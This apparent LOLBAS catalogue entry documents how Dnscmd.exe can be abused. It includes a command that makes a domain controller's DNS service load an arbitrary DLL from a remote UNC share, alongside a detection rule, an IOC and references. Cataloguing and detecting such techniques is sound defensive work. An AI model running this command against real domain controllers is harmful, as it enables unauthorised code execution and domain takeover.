mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-29 08:17:51 +01:00
23dd0236ae
* Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com>
36 lines
1.5 KiB
YAML
36 lines
1.5 KiB
YAML
---
|
|
Name: Dnscmd.exe
|
|
Description: A command-line interface for managing DNS servers
|
|
Author: 'Oddvar Moe'
|
|
Created: 2018-05-25
|
|
Commands:
|
|
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
|
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
|
Usecase: Remotely inject dll to dns server
|
|
Category: Execute
|
|
Privileges: DNS admin
|
|
MitreID: T1543.003
|
|
OperatingSystem: Windows server
|
|
Full_Path:
|
|
- Path: C:\Windows\System32\Dnscmd.exe
|
|
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
|
Code_Sample:
|
|
- Code:
|
|
Detection:
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
|
|
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
|
|
Resources:
|
|
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
|
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
|
- Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
|
|
- Link: https://twitter.com/Hexacorn/status/994000792628719618
|
|
- Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
|
|
Acknowledgement:
|
|
- Person: Shay Ber
|
|
Handle:
|
|
- Person: Dimitrios Slamaris
|
|
Handle: '@dim0x69'
|
|
- Person: Nikhil SamratAshok
|
|
Handle: '@nikhil_mitt'
|
|
---
|